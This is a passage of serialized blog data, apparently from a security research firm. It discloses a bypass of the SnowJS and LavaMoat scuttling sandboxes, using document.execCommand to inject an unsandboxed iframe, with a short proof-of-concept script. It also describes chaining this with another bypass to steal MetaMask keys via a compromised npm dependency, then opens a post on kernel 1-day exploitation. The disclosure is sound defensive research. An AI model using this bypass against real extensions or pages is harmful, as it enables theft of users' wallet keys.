DocumentFragment:",{"type":26,"tag":137,"props":52310,"children":52311},{"style":5601},[52312],{"type":32,"value":25612},{"type":26,"tag":137,"props":52314,"children":52315},{"style":6837},[52316],{"type":32,"value":52317},"'replaceChildren'",{"type":26,"tag":137,"props":52319,"children":52320},{"style":5601},[52321],{"type":32,"value":1108},{"type":26,"tag":137,"props":52323,"children":52324},{"style":6837},[52325],{"type":32,"value":52326},"'append'",{"type":26,"tag":137,"props":52328,"children":52329},{"style":5601},[52330],{"type":32,"value":1108},{"type":26,"tag":137,"props":52332,"children":52333},{"style":6837},[52334],{"type":32,"value":52335},"'prepend'",{"type":26,"tag":137,"props":52337,"children":52338},{"style":5601},[52339],{"type":32,"value":16854},{"type":26,"tag":137,"props":52341,"children":52342},{"class":5559,"line":5642},[52343,52348,52352,52356,52360,52364,52368,52372,52376,52381,52385,52390],{"type":26,"tag":137,"props":52344,"children":52345},{"style":5584},[52346],{"type":32,"value":52347},"    Document:",{"type":26,"tag":137,"props":52349,"children":52350},{"style":5601},[52351],{"type":32,"value":25612},{"type":26,"tag":137,"props":52353,"children":52354},{"style":6837},[52355],{"type":32,"value":52317},{"type":26,"tag":137,"props":52357,"children":52358},{"style":5601},[52359],{"type":32,"value":1108},{"type":26,"tag":137,"props":52361,"children":52362},{"style":6837},[52363],{"type":32,"value":52326},{"type":26,"tag":137,"props":52365,"children":52366},{"style":5601},[52367],{"type":32,"value":1108},{"type":26,"tag":137,"props":52369,"children":52370},{"style":6837},[52371],{"type":32,"value":52335},{"type":26,"tag":137,"props":52373,"children":52374},{"style":5601},[52375],{"type":32,"value":1108},{"type":26,"tag":137,"props":52377,"children":52378},{"style":6837},[52379],{"type":32,"value":52380},"'write'",{"type":26,"tag":137,"props":52382,"children":52383},{"style":5601},[52384],{"type":32,"value":1108},{"type":26,"tag":137,"props":52386,"children":52387},{"style":6837},[52388],{"type":32,"value":52389},"'writeln'",{"type":26,"tag":137,"props":52391,"children":52392},{"style":5601},[52393],{"type":32,"value":16854},{"type":26,"tag":137,"props":52395,"children":52396},{"class":5559,"line":5745},[52397,52402,52406,52411,52415,52420,52424,52429],{"type":26,"tag":137,"props":52398,"children":52399},{"style":5584},[52400],{"type":32,"value":52401},"    Node:",{"type":26,"tag":137,"props":52403,"children":52404},{"style":5601},[52405],{"type":32,"value":25612},{"type":26,"tag":137,"props":52407,"children":52408},{"style":6837},[52409],{"type":32,"value":52410},"'appendChild'",{"type":26,"tag":137,"props":52412,"children":52413},{"style":5601},[52414],{"type":32,"value":1108},{"type":26,"tag":137,"props":52416,"children":52417},{"style":6837},[52418],{"type":32,"value":52419},"'insertBefore'",{"type":26,"tag":137,"props":52421,"children":52422},{"style":5601},[52423],{"type":32,"value":1108},{"type":26,"tag":137,"props":52425,"children":52426},{"style":6837},[52427],{"type":32,"value":52428},"'replaceChild'",{"type":26,"tag":137,"props":52430,"children":52431},{"style":5601},[52432],{"type":32,"value":16854},{"type":26,"tag":137,"props":52434,"children":52435},{"class":5559,"line":5850},[52436,52441,52445,52450,52454,52459,52463,52468,52472,52477,52481,52486,52490,52494,52498,52503,52507,52511,52515,52520,52524,52528],{"type":26,"tag":137,"props":52437,"children":52438},{"style":5584},[52439],{"type":32,"value":52440},"    Element:",{"type":26,"tag":137,"props":52442,"children":52443},{"style":5601},[52444],{"type":32,"value":25612},{"type":26,"tag":137,"props":52446,"children":52447},{"style":6837},[52448],{"type":32,"value":52449},"'innerHTML'",{"type":26,"tag":137,"props":52451,"children":52452},{"style":5601},[52453],{"type":32,"value":1108},{"type":26,"tag":137,"props":52455,"children":52456},{"style":6837},[52457],{"type":32,"value":52458},"'outerHTML'",{"type":26,"tag":137,"props":52460,"children":52461},{"style":5601},[52462],{"type":32,"value":1108},{"type":26,"tag":137,"props":52464,"children":52465},{"style":6837},[52466],{"type":32,"value":52467},"'insertAdjacentHTML'",{"type":26,"tag":137,"props":52469,"children":52470},{"style":5601},[52471],{"type":32,"value":1108},{"type":26,"tag":137,"props":52473,"children":52474},{"style":6837},[52475],{"type":32,"value":52476},"'replaceWith'",{"type":26,"tag":137,"props":52478,"children":52479},{"style":5601},[52480],{"type":32,"value":1108},{"type":26,"tag":137,"props":52482,"children":52483},{"style":6837},[52484],{"type":32,"value":52485},"'insertAdjacentElement'",{"type":26,"tag":137,"props":52487,"children":52488},{"style":5601},[52489],{"type":32,"value":1108},{"type":26,"tag":137,"props":52491,"children":52492},{"style":6837},[52493],{"type":32,"value":52326},{"type":26,"tag":137,"props":52495,"children":52496},{"style":5601},[52497],{"type":32,"value":1108},{"type":26,"tag":137,"props":52499,"children":52500},{"style":6837},[52501],{"type":32,"value":52502},"'before'",{"type":26,"tag":137,"props":52504,"children":52505},{"style":5601},[52506],{"type":32,"value":1108},{"type":26,"tag":137,"props":52508,"children":52509},{"style":6837},[52510],{"type":32,"value":52335},{"type":26,"tag":137,"props":52512,"children":52513},{"style":5601},[52514],{"type":32,"value":1108},{"type":26,"tag":137,"props":52516,"children":52517},{"style":6837},[52518],{"type":32,"value":52519},"'after'",{"type":26,"tag":137,"props":52521,"children":52522},{"style":5601},[52523],{"type":32,"value":1108},{"type":26,"tag":137,"props":52525,"children":52526},{"style":6837},[52527],{"type":32,"value":52317},{"type":26,"tag":137,"props":52529,"children":52530},{"style":5601},[52531],{"type":32,"value":16854},{"type":26,"tag":137,"props":52533,"children":52534},{"class":5559,"line":5878},[52535,52540,52544,52548],{"type":26,"tag":137,"props":52536,"children":52537},{"style":5584},[52538],{"type":32,"value":52539},"    ShadowRoot:",{"type":26,"tag":137,"props":52541,"children":52542},{"style":5601},[52543],{"type":32,"value":25612},{"type":26,"tag":137,"props":52545,"children":52546},{"style":6837},[52547],{"type":32,"value":52449},{"type":26,"tag":137,"props":52549,"children":52550},{"style":5601},[52551],{"type":32,"value":16854},{"type":26,"tag":137,"props":52553,"children":52554},{"class":5559,"line":5891},[52555,52560,52564,52569],{"type":26,"tag":137,"props":52556,"children":52557},{"style":5584},[52558],{"type":32,"value":52559},"    HTMLIFrameElement:",{"type":26,"tag":137,"props":52561,"children":52562},{"style":5601},[52563],{"type":32,"value":25612},{"type":26,"tag":137,"props":52565,"children":52566},{"style":6837},[52567],{"type":32,"value":52568},"'srcdoc'",{"type":26,"tag":137,"props":52570,"children":52571},{"style":5601},[52572],{"type":32,"value":16854},{"type":26,"tag":137,"props":52574,"children":52575},{"class":5559,"line":5909},[52576],{"type":26,"tag":137,"props":52577,"children":52578},{"style":5601},[52579],{"type":32,"value":19170},{"type":26,"tag":35,"props":52581,"children":52582},{},[52583],{"type":32,"value":52584},"This means that an attacker can't use any of these functions to create an iframe and bypass the snowJS sandbox, because it will detect the new frame and include it in the sandbox.",{"type":26,"tag":35,"props":52586,"children":52587},{},[52588],{"type":32,"value":52589},"Unfortunately, client-side javascript is surprisingly complex with lots of strange behaviours that could be used to bypass the hook security feature.",{"type":26,"tag":118,"props":52591,"children":52593},{"id":52592},"bypassing-snowjs",[52594],{"type":32,"value":52595},"Bypassing SnowJS",{"type":26,"tag":35,"props":52597,"children":52598},{},[52599,52601,52612,52614,52620],{"type":32,"value":52600},"The deprecated ",{"type":26,"tag":41,"props":52602,"children":52605},{"href":52603,"rel":52604},"https://developer.mozilla.org/en-US/docs/Web/API/Document/execCommand",[45],[52606],{"type":26,"tag":130,"props":52607,"children":52609},{"className":52608},[],[52610],{"type":32,"value":52611},"document.execCommand",{"type":32,"value":52613}," function is used to execute commands inside a ",{"type":26,"tag":130,"props":52615,"children":52617},{"className":52616},[],[52618],{"type":32,"value":52619},"contenteditable",{"type":32,"value":52621}," focused context. Despite this being a deprecated function, it is still supported by modern browsers.",{"type":26,"tag":5512,"props":52623,"children":52626},{"className":52624,"code":52625,"language":34978,"meta":7,"style":7},"language-html shiki shiki-themes slack-dark","\u003Cdiv id=test contenteditable autofocus>\u003C/div>\n",[52627],{"type":26,"tag":130,"props":52628,"children":52629},{"__ignoreMap":7},[52630],{"type":26,"tag":137,"props":52631,"children":52632},{"class":5559,"line":5560},[52633,52637,52641,52645,52649,52654,52659,52664,52669,52673],{"type":26,"tag":137,"props":52634,"children":52635},{"style":34971},[52636],{"type":32,"value":8391},{"type":26,"tag":137,"props":52638,"children":52639},{"style":5573},[52640],{"type":32,"value":33941},{"type":26,"tag":137,"props":52642,"children":52643},{"style":5584},[52644],{"type":32,"value":35051},{"type":26,"tag":137,"props":52646,"children":52647},{"style":5601},[52648],{"type":32,"value":289},{"type":26,"tag":137,"props":52650,"children":52651},{"style":6837},[52652],{"type":32,"value":52653},"test",{"type":26,"tag":137,"props":52655,"children":52656},{"style":5584},[52657],{"type":32,"value":52658}," contenteditable",{"type":26,"tag":137,"props":52660,"children":52661},{"style":5584},[52662],{"type":32,"value":52663}," autofocus",{"type":26,"tag":137,"props":52665,"children":52666},{"style":34971},[52667],{"type":32,"value":52668},">\u003C/",{"type":26,"tag":137,"props":52670,"children":52671},{"style":5573},[52672],{"type":32,"value":33941},{"type":26,"tag":137,"props":52674,"children":52675},{"style":34971},[52676],{"type":32,"value":8577},{"type":26,"tag":35,"props":52678,"children":52679},{},[52680,52682,52688,52690,52695],{"type":32,"value":52681},"After inserting this element to a page, it is possible to use ",{"type":26,"tag":130,"props":52683,"children":52685},{"className":52684},[],[52686],{"type":32,"value":52687},"insertHTML",{"type":32,"value":52689}," command of ",{"type":26,"tag":130,"props":52691,"children":52693},{"className":52692},[],[52694],{"type":32,"value":52611},{"type":32,"value":52696}," to add a non-sandboxed iframe.",{"type":26,"tag":5512,"props":52698,"children":52700},{"className":33958,"code":52699,"language":33960,"meta":7,"style":7},"document.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\n",[52701],{"type":26,"tag":130,"props":52702,"children":52703},{"__ignoreMap":7},[52704],{"type":26,"tag":137,"props":52705,"children":52706},{"class":5559,"line":5560},[52707,52711,52715,52720,52724,52729,52733,52737,52741,52746],{"type":26,"tag":137,"props":52708,"children":52709},{"style":5584},[52710],{"type":32,"value":35303},{"type":26,"tag":137,"props":52712,"children":52713},{"style":5601},[52714],{"type":32,"value":470},{"type":26,"tag":137,"props":52716,"children":52717},{"style":5682},[52718],{"type":32,"value":52719},"execCommand",{"type":26,"tag":137,"props":52721,"children":52722},{"style":5601},[52723],{"type":32,"value":165},{"type":26,"tag":137,"props":52725,"children":52726},{"style":6837},[52727],{"type":32,"value":52728},"'insertHTML'",{"type":26,"tag":137,"props":52730,"children":52731},{"style":5601},[52732],{"type":32,"value":1108},{"type":26,"tag":137,"props":52734,"children":52735},{"style":5573},[52736],{"type":32,"value":10760},{"type":26,"tag":137,"props":52738,"children":52739},{"style":5601},[52740],{"type":32,"value":1108},{"type":26,"tag":137,"props":52742,"children":52743},{"style":6837},[52744],{"type":32,"value":52745},"'\u003Ciframe srcdoc=\"aaa\">'",{"type":26,"tag":137,"props":52747,"children":52748},{"style":5601},[52749],{"type":32,"value":6430},{"type":26,"tag":118,"props":52751,"children":52753},{"id":52752},"impact-on-lavamoat-scuttling",[52754],{"type":32,"value":52755},"Impact On Lavamoat Scuttling",{"type":26,"tag":35,"props":52757,"children":52758},{},[52759],{"type":32,"value":52760},"As it is recommended to use snowJS integrated with Lavamoat scuttling to prevent bypasses, it is possible to completely bypass the scuttling feature without pre-conditions.",{"type":26,"tag":35,"props":52762,"children":52763},{},[52764,52766,52771,52773,52778],{"type":32,"value":52765},"For the exploit, the only used functions are in ",{"type":26,"tag":130,"props":52767,"children":52769},{"className":52768},[],[52770],{"type":32,"value":35303},{"type":32,"value":52772}," object, which can never be scuttled once it is a non-writable and non-configurable property in ",{"type":26,"tag":130,"props":52774,"children":52776},{"className":52775},[],[52777],{"type":32,"value":40013},{"type":32,"value":52779}," object.",{"type":26,"tag":35,"props":52781,"children":52782},{},[52783,52785,52790],{"type":32,"value":52784},"Consider this example, which runs a scuttled ",{"type":26,"tag":130,"props":52786,"children":52788},{"className":52787},[],[52789],{"type":32,"value":35293},{"type":32,"value":28060},{"type":26,"tag":5512,"props":52792,"children":52794},{"className":33958,"code":52793,"language":33960,"meta":7,"style":7},"document.body.innerHTML = \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\";\ndocument.getElementById('test').focus();\ndocument.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\ndocument.getElementsByTagName('iframe')[0].contentWindow.alert(document.domain);\n",[52795],{"type":26,"tag":130,"props":52796,"children":52797},{"__ignoreMap":7},[52798,52834,52871,52914],{"type":26,"tag":137,"props":52799,"children":52800},{"class":5559,"line":5560},[52801,52805,52809,52813,52817,52821,52825,52830],{"type":26,"tag":137,"props":52802,"children":52803},{"style":5584},[52804],{"type":32,"value":35303},{"type":26,"tag":137,"props":52806,"children":52807},{"style":5601},[52808],{"type":32,"value":470},{"type":26,"tag":137,"props":52810,"children":52811},{"style":5584},[52812],{"type":32,"value":34995},{"type":26,"tag":137,"props":52814,"children":52815},{"style":5601},[52816],{"type":32,"value":470},{"type":26,"tag":137,"props":52818,"children":52819},{"style":5584},[52820],{"type":32,"value":37568},{"type":26,"tag":137,"props":52822,"children":52823},{"style":5590},[52824],{"type":32,"value":5593},{"type":26,"tag":137,"props":52826,"children":52827},{"style":6837},[52828],{"type":32,"value":52829}," \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\"",{"type":26,"tag":137,"props":52831,"children":52832},{"style":5601},[52833],{"type":32,"value":5604},{"type":26,"tag":137,"props":52835,"children":52836},{"class":5559,"line":5412},[52837,52841,52845,52849,52853,52858,52862,52867],{"type":26,"tag":137,"props":52838,"children":52839},{"style":5584},[52840],{"type":32,"value":35303},{"type":26,"tag":137,"props":52842,"children":52843},{"style":5601},[52844],{"type":32,"value":470},{"type":26,"tag":137,"props":52846,"children":52847},{"style":5682},[52848],{"type":32,"value":37593},{"type":26,"tag":137,"props":52850,"children":52851},{"style":5601},[52852],{"type":32,"value":165},{"type":26,"tag":137,"props":52854,"children":52855},{"style":6837},[52856],{"type":32,"value":52857},"'test'",{"type":26,"tag":137,"props":52859,"children":52860},{"style":5601},[52861],{"type":32,"value":4437},{"type":26,"tag":137,"props":52863,"children":52864},{"style":5682},[52865],{"type":32,"value":52866},"focus",{"type":26,"tag":137,"props":52868,"children":52869},{"style":5601},[52870],{"type":32,"value":6267},{"type":26,"tag":137,"props":52872,"children":52873},{"class":5559,"line":5417},[52874,52878,52882,52886,52890,52894,52898,52902,52906,52910],{"type":26,"tag":137,"props":52875,"children":52876},{"style":5584},[52877],{"type":32,"value":35303},{"type":26,"tag":137,"props":52879,"children":52880},{"style":5601},[52881],{"type":32,"value":470},{"type":26,"tag":137,"props":52883,"children":52884},{"style":5682},[52885],{"type":32,"value":52719},{"type":26,"tag":137,"props":52887,"children":52888},{"style":5601},[52889],{"type":32,"value":165},{"type":26,"tag":137,"props":52891,"children":52892},{"style":6837},[52893],{"type":32,"value":52728},{"type":26,"tag":137,"props":52895,"children":52896},{"style":5601},[52897],{"type":32,"value":1108},{"type":26,"tag":137,"props":52899,"children":52900},{"style":5573},[52901],{"type":32,"value":10760},{"type":26,"tag":137,"props":52903,"children":52904},{"style":5601},[52905],{"type":32,"value":1108},{"type":26,"tag":137,"props":52907,"children":52908},{"style":6837},[52909],{"type":32,"value":52745},{"type":26,"tag":137,"props":52911,"children":52912},{"style":5601},[52913],{"type":32,"value":6430},{"type":26,"tag":137,"props":52915,"children":52916},{"class":5559,"line":5642},[52917,52921,52925,52930,52934,52938,52943,52947,52952,52957,52961,52965,52969,52973,52977,52981],{"type":26,"tag":137,"props":52918,"children":52919},{"style":5584},[52920],{"type":32,"value":35303},{"type":26,"tag":137,"props":52922,"children":52923},{"style":5601},[52924],{"type":32,"value":470},{"type":26,"tag":137,"props":52926,"children":52927},{"style":5682},[52928],{"type":32,"value":52929},"getElementsByTagName",{"type":26,"tag":137,"props":52931,"children":52932},{"style":5601},[52933],{"type":32,"value":165},{"type":26,"tag":137,"props":52935,"children":52936},{"style":6837},[52937],{"type":32,"value":39326},{"type":26,"tag":137,"props":52939,"children":52940},{"style":5601},[52941],{"type":32,"value":52942},")[",{"type":26,"tag":137,"props":52944,"children":52945},{"style":5626},[52946],{"type":32,"value":1817},{"type":26,"tag":137,"props":52948,"children":52949},{"style":5601},[52950],{"type":32,"value":52951},"].",{"type":26,"tag":137,"props":52953,"children":52954},{"style":5584},[52955],{"type":32,"value":52956},"contentWindow",{"type":26,"tag":137,"props":52958,"children":52959},{"style":5601},[52960],{"type":32,"value":470},{"type":26,"tag":137,"props":52962,"children":52963},{"style":5682},[52964],{"type":32,"value":35293},{"type":26,"tag":137,"props":52966,"children":52967},{"style":5601},[52968],{"type":32,"value":165},{"type":26,"tag":137,"props":52970,"children":52971},{"style":5584},[52972],{"type":32,"value":35303},{"type":26,"tag":137,"props":52974,"children":52975},{"style":5601},[52976],{"type":32,"value":470},{"type":26,"tag":137,"props":52978,"children":52979},{"style":5584},[52980],{"type":32,"value":35313},{"type":26,"tag":137,"props":52982,"children":52983},{"style":5601},[52984],{"type":32,"value":6430},{"type":26,"tag":118,"props":52986,"children":52988},{"id":52987},"snowjs-patch",[52989],{"type":32,"value":52990},"SnowJS Patch",{"type":26,"tag":35,"props":52992,"children":52993},{},[52994,52996,53003,53005,53012],{"type":32,"value":52995},"Metamask is working on conceptual changes and aiming to integrate SnowJS as a ",{"type":26,"tag":41,"props":52997,"children":53000},{"href":52998,"rel":52999},"https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html#talk",[45],[53001],{"type":32,"value":53002},"browser feature within W3C standards",{"type":32,"value":53004},", with the intention of addressing not only this issue, but also all other well-known issues with SnowJS. ",{"type":26,"tag":41,"props":53006,"children":53009},{"href":53007,"rel":53008},"https://github.com/weizman/Realms-Initialization-Control",[45],[53010],{"type":32,"value":53011},"Here",{"type":32,"value":53013}," is their new proposal.",{"type":26,"tag":92,"props":53015,"children":53017},{"id":53016},"chaining-the-impacts",[53018],{"type":32,"value":53019},"Chaining The Impacts",{"type":26,"tag":35,"props":53021,"children":53022},{},[53023],{"type":32,"value":53024},"We were able to find two vulnerabilities in lavamoat project:",{"type":26,"tag":4820,"props":53026,"children":53027},{},[53028,53033],{"type":26,"tag":3430,"props":53029,"children":53030},{},[53031],{"type":32,"value":53032},"Policy File Bypass",{"type":26,"tag":3430,"props":53034,"children":53035},{},[53036],{"type":32,"value":53037},"Scuttling Bypass",{"type":26,"tag":35,"props":53039,"children":53040},{},[53041],{"type":32,"value":53042},"By combining the exploits, it is possible to completely bypass lavamoat supply-chain protections using a compromised dependency.",{"type":26,"tag":35,"props":53044,"children":53045},{},[53046],{"type":32,"value":53047},"Using Metamask as an example, these exploits could be used to retrieve the encrypted keypair in extension storage. The only precondition would be compromising a NPM dependency.",{"type":26,"tag":92,"props":53049,"children":53050},{"id":31526},[53051],{"type":32,"value":21540},{"type":26,"tag":35,"props":53053,"children":53054},{},[53055],{"type":32,"value":53056},"The vulnerability within the Lavapack module sandboxing, along with the issues we discussed regarding SnowJs and the Scuttling feature, illustrate the complexities of mitigating supply chain attacks within the JavaScript ecosystem. While the lavapack release with a mitigation was available in under two days, the inherent complexity makes designing robust security implementations a challenging task.",{"type":26,"tag":33941,"props":53058,"children":53059},{"style":33943},[53060],{"type":26,"tag":2210,"props":53061,"children":53064},{"src":53062,"alt":53063,"style":33949},"/posts/supply-chain-attacks-a-new-era/hello-otter.gif","Hello Otetr",[],{"type":26,"tag":21015,"props":53066,"children":53068},{"className":53067,"dataFootnotes":7},[21018],[53069,53074],{"type":26,"tag":92,"props":53070,"children":53072},{"className":53071,"id":18072},[21023],[53073],{"type":32,"value":21026},{"type":26,"tag":4820,"props":53075,"children":53076},{},[53077],{"type":26,"tag":3430,"props":53078,"children":53079},{"id":32960},[53080,53082,53089,53090],{"type":32,"value":53081},"Excluding SES, which was covered ",{"type":26,"tag":41,"props":53083,"children":53086},{"href":53084,"rel":53085},"https://osec.io/blog/2023-11-01-metamask-snaps",[45],[53087],{"type":32,"value":53088},"in our last article",{"type":32,"value":1011},{"type":26,"tag":41,"props":53091,"children":53093},{"href":32988,"ariaLabel":21128,"className":53092,"dataFootnoteBackref":7},[21130],[53094],{"type":32,"value":21133},{"type":26,"tag":7949,"props":53096,"children":53097},{},[53098],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":53100},[53101,53105,53111,53117,53118,53119],{"id":21549,"depth":5412,"text":21552,"children":53102},[53103,53104],{"id":31609,"depth":5417,"text":31612},{"id":49723,"depth":5417,"text":49726},{"id":50478,"depth":5412,"text":50481,"children":53106},[53107,53108,53109,53110],{"id":50729,"depth":5417,"text":50732},{"id":51204,"depth":5417,"text":51207},{"id":51861,"depth":5417,"text":51864},{"id":51984,"depth":5417,"text":51987},{"id":52102,"depth":5412,"text":52105,"children":53112},[53113,53114,53115,53116],{"id":52230,"depth":5417,"text":52233},{"id":52592,"depth":5417,"text":52595},{"id":52752,"depth":5417,"text":52755},{"id":52987,"depth":5417,"text":52990},{"id":53016,"depth":5412,"text":53019},{"id":31526,"depth":5412,"text":21540},{"id":18072,"depth":5412,"text":21026},"content:blog:2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era",{"_path":53124,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":53125,"description":53126,"author":53127,"image":53128,"date":53130,"isFeatured":18,"tags":53131,"onBlogPage":18,"body":53134,"_type":5433,"_id":63511,"_source":5435,"_file":63512,"_stem":63513,"_extension":5438},"/blog/2024-11-25-netfilter-universal-root-1-day","OtterRoot: Netfilter Universal Root 1-day","A peek into the state of Linux kernel security and the open-source patch-gap. We explore how we monitored commits to find new bug fixes and achieved 0day-like capabilities by exploiting a 1-day vulnerability.","pedro",{"src":53129,"height":11854,"width":8308},"/posts/netfilter-universal-root-1-day/cover.png","2024-11-25",[53132,53133],"kernal","linux",{"type":23,"children":53135,"toc":63479},[53136,53149,53163,53168,53174,53184,53189,53195,53200,53218,53232,53241,53274,53279,53285,53304,53337,53343,53356,53566,53633,54197,54216,54441,54500,54506,54526,54566,54754,54759,54910,54966,54971,55485,55504,55773,55799,56308,56375,56381,56417,56422,56688,56721,56733,56760,56772,56777,56783,56804,56810,56831,56854,57685,57691,57731,58271,58282,58316,58382,58436,58668,58674,58718,59181,59187,59198,59228,59311,59316,59321,59357,59409,59440,59995,60001,60018,60024,60029,60035,60063,60256,60276,60292,60887,60893,60928,60951,60963,60969,60997,61594,61619,62588,62599,62612,62625,63391,63405,63411,63423,63428,63456,63461,63465,63470,63475],{"type":26,"tag":35,"props":53137,"children":53138},{},[53139,53141,53148],{"type":32,"value":53140},"In late March, I attempted to monitor commits in Linux kernel subsystems that are hotspots for exploitable bugs, partially as an experiment to study how feasible it is to maintain LPE/container escape capabilities by patch-gapping/cycling 1-days, but also to submit to the ",{"type":26,"tag":41,"props":53142,"children":53145},{"href":53143,"rel":53144},"https://google.github.io/security-research/kernelctf/rules.html",[45],[53146],{"type":32,"value":53147},"KernelCTF VRP",{"type":32,"value":470},{"type":26,"tag":35,"props":53150,"children":53151},{},[53152,53154,53161],{"type":32,"value":53153},"During the research, I quickly came across an exploitable bug fixed in netfilter, which was labeled CVE-2024-26809 (originally discovered by ",{"type":26,"tag":41,"props":53155,"children":53158},{"href":53156,"rel":53157},"https://github.com/conlonialC",[45],[53159],{"type":32,"value":53160},"lonial con",{"type":32,"value":53162},") and was able to exploit it in the KernelCTF LTS instance and write a universal exploit that runs across different kernel builds without the need to recompile with different symbols or ROP gadgets.",{"type":26,"tag":35,"props":53164,"children":53165},{},[53166],{"type":32,"value":53167},"In this post, I'll discuss how I exploited a 1day to obtain 0day-like LPE/container escape capabilities for around two months by quickly abusing the patch-gap to write an exploit before the fix could go downstream. I'll also share my journey analyzing the patch to understand the bug, isolate the commit(s) that introduced it, exploit it in the KernelCTF VRP, and, finally, how I developed a universal exploit to target mainstream distros.",{"type":26,"tag":92,"props":53169,"children":53171},{"id":53170},"the-kernel",[53172],{"type":32,"value":53173},"The kernel",{"type":26,"tag":35,"props":53175,"children":53176},{},[53177,53179],{"type":32,"value":53178},"The kernel lies at the very core of an OS; its purpose is not to be a regular application but to create a platform that applications can run on top of. The kernel touches hardware directly to implement everything you can expect from your OS, such as user isolation and permissions, networking, filesystem access, memory management, task scheduling, etc.\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀",{"type":26,"tag":2210,"props":53180,"children":53183},{"alt":53181,"src":53182},"image","/posts/netfilter-universal-root-1-day/kernal.png",[],{"type":26,"tag":35,"props":53185,"children":53186},{},[53187],{"type":32,"value":53188},"The kernel exposes an interface that user applications can use to request things they can't do directly (e.g. map some memory to my process' virtual address space, expose some file to my process, open a network socket, etc.). This is called the syscall interface, the main form of passing data from userspace to kernelspace.",{"type":26,"tag":118,"props":53190,"children":53192},{"id":53191},"kernel-exploitation",[53193],{"type":32,"value":53194},"Kernel exploitation",{"type":26,"tag":35,"props":53196,"children":53197},{},[53198],{"type":32,"value":53199},"As the kernel processes requests passed by user applications, it is subject to bugs and security vulnerabilities just as any code would, ranging from logic issues to memory corruptions that attackers can use to hijack the execution in kernel context or escalate privileges in some other way. With that in mind, we can expect the typical kernel exploit to look like this:",{"type":26,"tag":3426,"props":53201,"children":53202},{},[53203,53208,53213],{"type":26,"tag":3430,"props":53204,"children":53205},{},[53206],{"type":32,"value":53207},"Trigger some memory corruption in some kernel subsystem",{"type":26,"tag":3430,"props":53209,"children":53210},{},[53211],{"type":32,"value":53212},"Use it to acquire some stronger primitive (Control-flow, Arb R/W, etc.)",{"type":26,"tag":3430,"props":53214,"children":53215},{},[53216],{"type":32,"value":53217},"Use your current primitive to escalate your privileges (usually by changing the creds of your process or something with similar consequences)",{"type":26,"tag":35,"props":53219,"children":53220},{},[53221,53223,53230],{"type":32,"value":53222},"I strongly recommend reading Lkmidas' Intro to Kernel Exploitation ",{"type":26,"tag":41,"props":53224,"children":53227},{"href":53225,"rel":53226},"https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/",[45],[53228],{"type":32,"value":53229},"blog post",{"type":32,"value":53231}," to become more familiar with the topic.",{"type":26,"tag":92,"props":53233,"children":53235},{"id":53234},"nf_tables",[53236],{"type":26,"tag":130,"props":53237,"children":53239},{"className":53238},[],[53240],{"type":32,"value":53234},{"type":26,"tag":35,"props":53242,"children":53243},{},[53244,53249,53251,53257,53258,53264,53266,53272],{"type":26,"tag":130,"props":53245,"children":53247},{"className":53246},[],[53248],{"type":32,"value":53234},{"type":32,"value":53250}," is a component of the netfilter subsystem of the Linux kernel. It is a package filtering mechanism, and it's the current backend used by tools like iptables and Firewalld. Its internals have been thoroughly discussed by other researchers ",{"type":26,"tag":41,"props":53252,"children":53255},{"href":53253,"rel":53254},"https://pwning.tech/nftables",[45],[53256],{"type":32,"value":878},{"type":32,"value":1108},{"type":26,"tag":41,"props":53259,"children":53262},{"href":53260,"rel":53261},"https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation",[45],[53263],{"type":32,"value":277},{"type":32,"value":53265},". I recommend reading those briefly to understand the hierarchical structure of ",{"type":26,"tag":130,"props":53267,"children":53269},{"className":53268},[],[53270],{"type":32,"value":53271},"nf_table",{"type":32,"value":53273}," objects and how we can manipulate them to create configurable filtering mechanisms.",{"type":26,"tag":35,"props":53275,"children":53276},{},[53277],{"type":32,"value":53278},"For the sake of this blog post I'll omit any details that are not directly related to the vulnerability.",{"type":26,"tag":118,"props":53280,"children":53282},{"id":53281},"transactions",[53283],{"type":32,"value":53284},"Transactions",{"type":26,"tag":35,"props":53286,"children":53287},{},[53288,53290,53295,53297,53302],{"type":32,"value":53289},"A transaction is an interaction that updates ",{"type":26,"tag":130,"props":53291,"children":53293},{"className":53292},[],[53294],{"type":32,"value":53234},{"type":32,"value":53296}," objects/state. It's roughly composed of a batch of operations that modify some ",{"type":26,"tag":130,"props":53298,"children":53300},{"className":53299},[],[53301],{"type":32,"value":53234},{"type":32,"value":53303}," object (adding/removing/editing tables, sets, elements, objects, etc). They are roughly composed of 3 different passes:",{"type":26,"tag":3426,"props":53305,"children":53306},{},[53307,53317,53327],{"type":26,"tag":3430,"props":53308,"children":53309},{},[53310,53315],{"type":26,"tag":84,"props":53311,"children":53312},{},[53313],{"type":32,"value":53314},"Control plane",{"type":32,"value":53316},"\nPrepare each operation, and if some fail, abort the whole batch; otherwise, commit the entire batch.",{"type":26,"tag":3430,"props":53318,"children":53319},{},[53320,53325],{"type":26,"tag":84,"props":53321,"children":53322},{},[53323],{"type":32,"value":53324},"Commit path",{"type":32,"value":53326},"\nAfter the control plane, if all succeed, we apply the changes (effectively modify tables, sets, etc.).",{"type":26,"tag":3430,"props":53328,"children":53329},{},[53330,53335],{"type":26,"tag":84,"props":53331,"children":53332},{},[53333],{"type":32,"value":53334},"Abort path",{"type":32,"value":53336},"\nOnly triggered when some error condition is detected in the control plane; undo actions done during the control plane and skip commitment.",{"type":26,"tag":92,"props":53338,"children":53340},{"id":53339},"vulnerability-details",[53341],{"type":32,"value":53342},"Vulnerability details",{"type":26,"tag":35,"props":53344,"children":53345},{},[53346,53348,53354],{"type":32,"value":53347},"Moving on, let's check out the ",{"type":26,"tag":41,"props":53349,"children":53352},{"href":53350,"rel":53351},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b0e256f3dd2ba6532f37c5c22e07cb07a36031ee",[45],[53353],{"type":32,"value":6805},{"type":32,"value":53355}," that fixed the 